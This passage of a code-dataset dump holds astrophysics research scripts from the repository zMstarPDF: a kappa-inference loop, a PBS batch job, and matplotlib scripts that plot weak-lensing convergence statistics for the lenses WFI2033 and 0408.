E_w1_inf, \",\", limsigma * E_w1_sup, \") \" #, \"gauss_weight4 = \", gauss.pdf(float(E4)/E_w4)\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0)] # this is equation 3 in Greene et al.\n if data.size > 0:\n if E1 < 0: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_inf) # for asymmetric limits, implement a gaussian on each side\n else: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_sup)\n if unbias == False: kappa_constrained = np.histogram(data, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float) * gauss_factorE1 / data.shape[0]\n else: kappa_constrained = np.histogram(data, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float) * gauss_factorE1\n if LOS == 0:\n unbiased_kappa_constrained = kappa_constrained\n else:\n unbiased_kappa_constrained = unbiased_kappa_constrained + kappa_constrained # I tested that this addition works correctly\n LOS = LOS + data.size\n\n#head = 'LOS: %d' % np.array([LOS])\nhead = 'LOS: %d' % np.array([len(kappa)])\nnp.savetxt(output,unbiased_kappa_constrained,header=head,fmt='%s',delimiter='\\t',newline='\\n')\nprint(\" time for computing kappa %s seconds\" % (time.time() - start1))\n\nif (conjoined == 1) | (conjoined == 2) | (conjoined == 3):\n print \"increment1 = \", increment1\nif (conjoined == 2) | (conjoined == 3):\n print \"increment2 = \", increment2\nif (conjoined == 3):\n print \"increment3 = \", increment3\n\nprint(\" Total time --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.647519588470459, "alphanum_fraction": 0.7362924218177795, "avg_line_length": 20.27777862548828, "blob_id": "165eafd58f3ac4a0af8162105120a2b05fe01fd3", "content_id": "b1edba818c8d1fb02785cc69b1d7906fec6fdefb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 383, "license_type": "no_license", "max_line_length": 70, "num_lines": 18, "path": "/python/scripts/NAOJ/batch_infer36.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log36.out\n#PBS -e Log36.err\n#PBS -N 36\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappa_unbiasedwithshear.py WFI2033 5 45 23 meds gal gamma\npython inferkappa_unbiasedwithshear.py WFI2033 5 120 23 meds gal gamma\n" }, { "alpha_fraction": 0.5219938158988953, "alphanum_fraction": 0.6320202350616455, "avg_line_length": 92.6236572265625, "blob_id": "2d35d58c42f12f456291ccf652759cd3797468d5", "content_id": "52ccb5584ada411c1baee0ae57c2b5456d480d55", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8707, "license_type": "no_license", "max_line_length": 377, "num_lines": 93, "path": "/python/plot_utilities/plotkappabar_conjointgalzoverrgalgamma.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# The code uses the output statistics produced by plotkappacompletestatistics.py/plotkappabiascompletestatistics.py in order to plot bars. Run without arguments. 
Make sure to uncomment the appropriate ax.set_ylim, ylabel and savefig lines\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\nimport sys\nimport os\nfrom os import system\n\nroot = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/kappa/\"\ndata = np.genfromtxt('%smedstd.dat' % root,dtype=['S1000','f8','f8','f8','f8'])\n\nkappastat = np.array([])\nfor i in range(np.shape(data)[0]):\n    if i == 0:\n        kappastat = np.array([data[i][0],data[i][1],data[i][2],data[i][3],data[i][4]])\n    else:\n        x = np.array([data[i][0],data[i][1],data[i][2],data[i][3],data[i][4]])\n        kappastat = np.c_[kappastat,x]\n\nkappastat_45 = np.c_[ kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_120_gal_22.5_med_increments1_1_1_emptymsk.cat'][0][1:].astype(float), # 1-1/r\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_45_z_120_gal_120_gamma_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # z\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_45_mass_120_gal_120_gamma_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_45_mass2_120_gal_120_gamma_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_45_mass3_120_gal_120_gamma_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_45_massoverr_120_gal_120_gamma_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # massoverr\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_45_mass2overr_120_gal_120_gamma_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2overr\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_45_mass3overr_120_gal_120_gamma_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3overr\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_45_mass2rms_120_gal_120_gamma_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2rms\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_45_mass3rms_120_gal_120_gamma_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3rms\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_45_mass2overrrms_120_gal_120_gamma_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2overrrms\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_45_mass3overrrms_120_gal_120_gamma_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3overrrms\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_45_flexion_120_gal_120_gamma_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # flexion\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_45_tidal_120_gal_120_gamma_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # tidal\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_45_SIS_120_gal_120_gamma_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # SIS\n                      kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_45_SIShalo_120_gal_120_gamma_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float)] # SIShalo\n\nkappastat_120 = np.c_[ kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_45_gal_22.5_med_increments1_1_1_emptymsk.cat'][0][1:].astype(float), # 1-1/r\n                       kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_120_gal_120_gamma_120_z_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), 
# z\n                       kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_120_gal_120_gamma_120_mass_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass\n                       kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_120_gal_120_gamma_120_mass2_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2\n                       kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_120_gal_120_gamma_120_mass3_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3\n                       kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_120_gal_120_gamma_120_massoverr_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # massoverr\n                       kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_120_gal_120_gamma_120_mass2overr_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2overr\n                       kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_120_gal_120_gamma_120_mass3overr_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3overr\n                       kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_120_gal_120_gamma_120_mass2rms_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2rms\n                       kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_120_gal_120_gamma_120_mass3rms_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3rms\n                       kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_120_gal_120_gamma_120_mass2overrrms_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2overrrms\n                       kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_120_gal_120_gamma_120_mass3overrrms_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3overrrms\n                       kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_120_gal_120_gamma_120_flexion_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # flexion\n                       kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_120_gal_120_gamma_120_tidal_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # tidal\n                       kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_120_gal_120_gamma_120_SIS_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # SIS\n                       kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_120_gal_120_gamma_120_SIShalo_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float)] # SIShalo\n\nN = 16\nind = 2.5 * np.arange(N) # the x locations for the groups\nwidth = 0.8 # the width of the bars\n\nax = plt.subplot(2,1,1)\n\ncol1 = (kappastat_45[0])\nrects1 = ax.bar(ind + width, col1, width, color='r')\ncol2 = (kappastat_120[0])\nrects2 = ax.bar(ind + 2*width, col2, width, color='b')\n\n#ax.set_ylim([0.00,0.05])\nax.set_ylim([-0.02,0.08])\nax.set_ylabel('median$_\\kappa$')\n#ax.set_ylabel('$\\mathrm{median}_{\\kappa_\\mathrm{med} - \\kappa_\\mathrm{true}}$')\nax.set_xticks(ind + 2*width)\nax.set_xticklabels(('$1-z/r$', '$z$', '$M_\\star$', '$M^2_\\star$', '$M^3_\\star$', '$M_\\star/r$', '$M^2_\\star/r$', '$M^3_\\star/r$', '$M^2_{\\star\\mathrm{rms}}$', '$M^3_{\\star\\mathrm{rms}}$', '$M^2_\\star/r_\\mathrm{,rms}$', '$M^3_\\star/r_\\mathrm{,rms}$', '$M_\\star/r^3$', '$M_\\star/r^2$', '$\\sqrt{M_\\star}/r$', '$\\sqrt{M_h}/r$'), fontsize=10, rotation='vertical') # 16 labels, one per plotted constraint column\n\nax = plt.subplot(2,1,2)\n\ncol3 = (kappastat_45[1])\nrects3 = ax.bar(ind + width, col3, width, color='r')\ncol4 = (kappastat_120[1])\nrects4 = ax.bar(ind + 2*width, col4, width, color='b')\n\nax.set_ylim([0,0.08])\nax.set_ylabel('$\\sigma_\\kappa$')\n#ax.set_ylabel('$\\sigma_{\\kappa_\\mathrm{med} - \\kappa_\\mathrm{true}}$')\nax.set_xticks(ind + 
width)\nax.set_xticklabels(('$1-z/r$', '$z$', '$M_\\star$', '$M^2_\\star$', '$M^3_\\star$', '$M_\\star/r$', '$M^2_\\star/r$', '$M^3_\\star/r$', '$M^2_{\\star\\mathrm{rms}}$', '$M^3_{\\star\\mathrm{rms}}$', '$M^2_\\star/r_\\mathrm{,rms}$', '$M^3_\\star/r_\\mathrm{,rms}$', '$M_\\star/r^3$', '$M_\\star/r^2$', '$\\sqrt{M_\\star}/r$', '$\\sqrt{M_h}/r$'), fontsize=10, rotation='vertical')\nax.legend((rects1[0], rects2[0]), ('22.5 120 gal+$\\gamma$ 45 gal+z/r+', '22.5 45 gal+z/r 120 gal+$\\gamma$+'), bbox_to_anchor=(0.65, 1.4), fontsize=10)\n#ax.legend((rects1[0], rects2[0]), ('45 22.5 gal+1/r+$\\gamma$+', '120 22.5 gal+1/r+$\\gamma$+'), bbox_to_anchor=(0.3, 0.97), fontsize=10)\nplt.subplots_adjust(left=0.15, bottom=0.15, right=0.95, top=0.95, wspace=0.7, hspace=0.7)\nplt.savefig('%skappashistbar-conjointgalzoverrgalgamma.png' % root, dpi=250)\n\nplt.clf()\n"
},
{
"alpha_fraction": 0.596726655960083,
"alphanum_fraction": 0.6769360303878784,
"avg_line_length": 62.95075607299805,
"blob_id": "7eba66cf4e4a202d64aba091300af4c5c96ad63f",
"content_id": "38baebdc4980cae3b44bbb9ac15744c87c922927",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16619,
"license_type": "no_license",
"max_line_length": 243,
"num_lines": 264,
"path": "/python/plot_utilities/plotkappa_handpicked.py",
"repo_name": "eduardrusu/zMstarPDF",
"src_encoding": "UTF-8",
"text": "# Plots the equivalent of Figure 13 in Rusu et al. 2017\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\n\nmin_kappa = -0.20\nmax_kappa = 1\nmin_kappa_plot = -0.1\nmax_kappa_plot = 0.15\nbin_stat = 2000\nhalfwidth = (max_kappa - min_kappa) / (bin_stat * 2.0)\n\n#root = \"/Users/cerusu/Dropbox/\"\n#root = \"/Volumes/LaCieSubaru/kapparesults/\"\nroot = \"/Users/cerusu/Dropbox/Davis_work/code/0408/\"\n\ndef statistics(kappa_all_,bin_stat_,min_kappa_,max_kappa_):\n    a, kappa_values = np.histogram([0], bins = bin_stat_, range=(min_kappa_,max_kappa_)) # create an empty histogram of the correct shape\n\n    sum = np.sum(kappa_all_)\n    #meanX = np.sum(kappa_counts * (kappa_values[:-1] + halfwidth)) / sum\n    #meanX2 = np.sum(kappa_counts * (kappa_values[:-1] + halfwidth) ** 2) / sum\n    #std = np.sqrt(meanX2 - meanX**2)\n\n    med = 0\n    i = 0\n    ok = False\n    while (med <= sum/2.0) and (ok == False):\n        med = med + kappa_all_[i]\n        if med > sum/2.0:\n            median = kappa_values[i] + halfwidth\n            ok = True\n        if med == sum/2.0:\n            median = kappa_values[i] + 2 * halfwidth\n            ok = True\n        i = i + 1\n\n    std = 0\n    ok = False\n    i = 0\n    while (std <= sum * 0.16) and (ok == False):\n        std = std + kappa_all_[i]\n        if std > sum * 0.16:\n            std1_ = kappa_values[i] + halfwidth\n            ok = True\n        if std == sum * 0.16:\n            std1_ = kappa_values[i] + 2 * halfwidth\n            ok = True\n        i = i + 1\n\n    std = 0\n    ok = False\n    i = 0\n    while (std <= sum*0.84) and (ok == False):\n        std = std + kappa_all_[i]\n        if std > sum*0.84:\n            std1 = kappa_values[i] + halfwidth\n            ok = True\n        if std == sum*0.84:\n            std1 = kappa_values[i] + 2 * halfwidth\n            ok = True\n        i = i + 1\n\n    stddev = (std1 - std1_) / 2\n\n    return median,stddev,kappa_values\n\ndef smooth(x,window_len=11,window='hanning'):\n    \"\"\"smooth the data using a window with requested size.\n\n    This method is based on the convolution of a scaled window with the signal.\n    The signal is prepared by introducing reflected copies of the signal\n    (with the window size) at both ends so that transient parts are minimized\n    in 
the beginning and end parts of the output signal.\n\n    input:\n        x: the input signal\n        window_len: the dimension of the smoothing window; should be an odd integer\n        window: the type of window from 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'\n            flat window will produce a moving average smoothing.\n\n    output: the smoothed signal\n\n    see also:\n\n    numpy.hanning, numpy.hamming, numpy.bartlett, numpy.blackman, numpy.convolve\n    scipy.signal.lfilter\n\n    TODO: the window parameter could be the window itself if an array instead of a string\n    NOTE: length(output) != length(input), to correct this: return y[(window_len/2-1):-(window_len/2)] instead of just y.\n    \"\"\"\n\n    if x.ndim != 1:\n        raise ValueError, "smooth only accepts 1 dimension arrays."\n    if not window in ['flat', 'hanning', 'hamming', 'bartlett', 'blackman']:\n        raise ValueError, "Window is one of 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'"\n    if x.size < window_len:\n        raise ValueError, "Input vector needs to be bigger than window size."\n\n    if window_len<3:\n        return x\n    s=np.r_[x[window_len-1:0:-1],x,x[-2:-window_len-1:-1]]\n    if window == 'flat': #moving average\n        w=np.ones(window_len,'d')\n    else:\n        w=eval('np.'+window+'(window_len)')\n    y=np.convolve(w/w.sum(),s,mode='valid')\n    return y\n\nplt.clf()\n\nkappa_0 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_composite_45_gal_45_gamma_45_oneoverr_22.5_med_increments1_1_1_shearwithoutprior.cat\" % root, usecols=[0], unpack=True)\nmedian0,stddev0,kappa_values = statistics(kappa_0,bin_stat,min_kappa,max_kappa)\nkappa_0 = kappa_0 / np.sum(kappa_0 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_1 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_composite_45_gal_45_gamma_45_z_120_gal_120_z_22.5_med_increments1_1_1_1_1_shearwithoutprior.cat\" % root, usecols=[0], unpack=True)\nmedian1,stddev1,kappa_values = statistics(kappa_1,bin_stat,min_kappa,max_kappa)\nkappa_1 = kappa_1 / np.sum(kappa_1 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_2 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_composite_45_gal_45_gamma_45_zoverr_22.5_med_increments1_1_1_shearwithoutprior.cat\" % root, usecols=[0], unpack=True)\nmedian2,stddev2,kappa_values = statistics(kappa_2,bin_stat,min_kappa,max_kappa)\nkappa_2 = kappa_2 / np.sum(kappa_2 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_3 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_composite_120_gal_120_gamma_120_oneoverr_22.5_med_increments1_1_1_shearwithoutprior.cat\" % root, usecols=[0], unpack=True)\nmedian3,stddev3,kappa_values = statistics(kappa_3,bin_stat,min_kappa,max_kappa)\nkappa_3 = kappa_3 / np.sum(kappa_3 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_4 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_composite_120_gal_120_gamma_120_oneoverr_45_gal_45_oneoverr_22.5_med_increments1_1_1_1_1_shearwithoutprior.cat\" % root, usecols=[0], unpack=True)\nmedian4,stddev4,kappa_values = statistics(kappa_4,bin_stat,min_kappa,max_kappa)\nkappa_4 = kappa_4 / np.sum(kappa_4 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_5 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_composite_120_gal_120_gamma_120_oneoverr_45_gal_45_zoverr_22.5_med_increments1_1_1_1_1_shearwithoutprior.cat\" % root, usecols=[0], unpack=True)\nmedian5,stddev5,kappa_values = 
statistics(kappa_5,bin_stat,min_kappa,max_kappa)\nkappa_5 = kappa_5 / np.sum(kappa_5 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_6 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_composite_120_gal_120_gamma_120_zoverr_22.5_med_increments1_1_1_shearwithoutprior.cat\" % root, usecols=[0], unpack=True)\nmedian6,stddev6,kappa_values = statistics(kappa_6,bin_stat,min_kappa,max_kappa)\nkappa_6 = kappa_6 / np.sum(kappa_6 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_7 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_powerlaw_45_gal_45_gamma_45_oneoverr_22.5_med_increments1_1_1_shearwithoutprior.cat\" % root, usecols=[0], unpack=True)\nmedian7,stddev7,kappa_values = statistics(kappa_7,bin_stat,min_kappa,max_kappa)\nkappa_7 = kappa_7 / np.sum(kappa_7 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_8 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_powerlaw_45_gal_45_gamma_45_z_120_gal_120_z_22.5_med_increments1_1_1_1_1_shearwithoutprior.cat\" % root, usecols=[0], unpack=True)\nmedian8,stddev8,kappa_values = statistics(kappa_8,bin_stat,min_kappa,max_kappa)\nkappa_8 = kappa_8 / np.sum(kappa_8 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_9 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_powerlaw_45_gal_45_gamma_45_zoverr_22.5_med_increments1_1_1_shearwithoutprior.cat\" % root, usecols=[0], unpack=True)\nmedian9,stddev9,kappa_values = statistics(kappa_9,bin_stat,min_kappa,max_kappa)\nkappa_9 = kappa_9 / np.sum(kappa_9 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_10 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_powerlaw_45_gal_45_gamma_45_zoverr_120_gal_120_zoverr_22.5_med_increments1_1_1_1_1_shearwithoutprior.cat\" % root, usecols=[0], unpack=True)\nmedian10,stddev10,kappa_values = statistics(kappa_10,bin_stat,min_kappa,max_kappa)\nkappa_10 = kappa_10 / np.sum(kappa_10 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_11 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_powerlaw_45_gal_45_oneoverr_22.5_med_increments1_1.cat\" % root, usecols=[0], unpack=True)\nmedian11,stddev11,kappa_values = statistics(kappa_11,bin_stat,min_kappa,max_kappa)\nkappa_11 = kappa_11 / np.sum(kappa_11 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_12 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_powerlaw_45_gal_45_zoverr_22.5_med_increments1_1.cat\" % root, usecols=[0], unpack=True)\nmedian12,stddev12,kappa_values = statistics(kappa_12,bin_stat,min_kappa,max_kappa)\nkappa_12 = kappa_12 / np.sum(kappa_12 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_13 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_powerlaw_120_gal_120_gamma_120_oneoverr_22.5_med_increments1_1_1_shearwithoutprior.cat\" % root, usecols=[0], unpack=True)\nmedian13,stddev13,kappa_values = statistics(kappa_13,bin_stat,min_kappa,max_kappa)\nkappa_13 = kappa_13 / np.sum(kappa_13 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_14 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_powerlaw_120_gal_120_gamma_120_oneoverr_45_gal_45_oneoverr_22.5_med_increments1_1_1_1_1_shearwithoutprior.cat\" % root, usecols=[0], unpack=True)\nmedian14,stddev14,kappa_values = statistics(kappa_14,bin_stat,min_kappa,max_kappa)\nkappa_14 = kappa_14 / np.sum(kappa_14 * 
np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_15 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_powerlaw_120_gal_120_gamma_120_oneoverr_45_gal_45_zoverr_22.5_med_increments1_1_1_1_1_shearwithoutprior.cat\" % root, usecols=[0], unpack=True)\nmedian15,stddev15,kappa_values = statistics(kappa_15,bin_stat,min_kappa,max_kappa)\nkappa_15 = kappa_15 / np.sum(kappa_15 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_16 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_powerlaw_120_gal_120_gamma_120_zoverr_22.5_med_increments1_1_1_shearwithoutprior.cat\" % root, usecols=[0], unpack=True)\nmedian16,stddev16,kappa_values = statistics(kappa_16,bin_stat,min_kappa,max_kappa)\nkappa_16 = kappa_16 / np.sum(kappa_16 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_17 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_powerlaw_120_gal_120_oneoverr_22.5_med_increments1_1.cat\" % root, usecols=[0], unpack=True)\nmedian17,stddev17,kappa_values = statistics(kappa_17,bin_stat,min_kappa,max_kappa)\nkappa_17 = kappa_17 / np.sum(kappa_17 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_18 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_powerlaw_120_gal_120_oneoverr_45_gal_45_oneoverr_22.5_med_increments1_1_1_1.cat\" % root, usecols=[0], unpack=True)\nmedian18,stddev18,kappa_values = statistics(kappa_18,bin_stat,min_kappa,max_kappa)\nkappa_18 = kappa_18 / np.sum(kappa_18 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_19 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_powerlaw_120_gal_120_oneoverr_45_gal_45_zoverr_22.5_med_increments1_1_1_1.cat\" % root, usecols=[0], unpack=True)\nmedian19,stddev19,kappa_values = statistics(kappa_19,bin_stat,min_kappa,max_kappa)\nkappa_19 = kappa_19 / np.sum(kappa_19 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_20 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_powerlaw_120_gal_120_zoverr_22.5_med_increments1_1.cat\" % root, usecols=[0], unpack=True)\nmedian20,stddev20,kappa_values = statistics(kappa_20,bin_stat,min_kappa,max_kappa)\nkappa_20 = kappa_20 / np.sum(kappa_20 * np.abs((kappa_values[:-1]+halfwidth)))\n\n#s = \"%.3f %.3f LOS=%d\" % (median,std1,LOS)\ns0 = \"%.3f %.3f\" % (median0,stddev0)\ns1 = \"%.3f %.3f\" % (median1,stddev1)\ns2 = \"%.3f %.3f\" % (median2,stddev2)\ns3 = \"%.3f %.3f\" % (median3,stddev3)\ns4 = \"%.3f %.3f\" % (median4,stddev4)\ns5 = \"%.3f %.3f\" % (median5,stddev5)\ns6 = \"%.3f %.3f\" % (median6,stddev6)\ns7 = \"%.3f %.3f\" % (median7,stddev7)\ns8 = \"%.3f %.3f\" % (median8,stddev8)\ns9 = \"%.3f %.3f\" % (median9,stddev9)\ns10 = \"%.3f %.3f\" % (median10,stddev10)\ns11 = \"%.3f %.3f\" % (median11,stddev11)\ns12 = \"%.3f %.3f\" % (median12,stddev12)\ns13 = \"%.3f %.3f\" % (median13,stddev13)\ns14 = \"%.3f %.3f\" % (median14,stddev14)\ns15 = \"%.3f %.3f\" % (median15,stddev15)\ns16 = \"%.3f %.3f\" % (median16,stddev16)\ns17 = \"%.3f %.3f\" % (median17,stddev17)\ns18 = \"%.3f %.3f\" % (median18,stddev18)\ns19 = \"%.3f %.3f\" % (median19,stddev19)\ns20 = \"%.3f %.3f\" % (median20,stddev20)\n\nplt.subplot(1,1,1)\nax = plt.subplot(1,1,1)\nax.tick_params(labelsize=15)\nplt.xlim(min_kappa_plot, max_kappa_plot)\nplt.ylim(0, 0.25)\n\nwinlen = 
12\n#smooth(kappa_3,winlen,'flat')\n#smooth(kappa_3,winlen,'hanning')\n#smooth(kappa_3,winlen,'hamming')\n#smooth(kappa_3,winlen,'bartlett')\n#smooth(kappa_3,winlen,'blackman')\n\nplt.plot(kappa_values[:-1],smooth(kappa_11,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='b', linewidth=1, linestyle=':', label ='%s; $45: 1,1/r$' %s11)\nplt.plot(kappa_values[:-1],smooth(kappa_12,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='g', linewidth=1, linestyle=':', label ='%s; $45: 1,z/r$' %s12)\nplt.plot(kappa_values[:-1],smooth(kappa_17,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='r', linewidth=1, linestyle=':', label ='%s; $120: 1,1/r$' %s17)\nplt.plot(kappa_values[:-1],smooth(kappa_20,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='c', linewidth=1, linestyle=':', label ='%s; $120: 1,z/r$' %s20)\nplt.plot(kappa_values[:-1],smooth(kappa_18,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='m', linewidth=1, linestyle=':', label ='%s; $120: 1,1/r; 45:1,1/r$' %s18)\nplt.plot(kappa_values[:-1],smooth(kappa_19,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='k', linewidth=1, linestyle=':', label ='%s; $120: 1,1/r; 45:1,z/r$' %s19)\n\nplt.plot(kappa_values[:-1],smooth(kappa_0,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='b', linewidth=1, linestyle='--', label ='%s; $45: 1,\\gamma_c,1/r$' 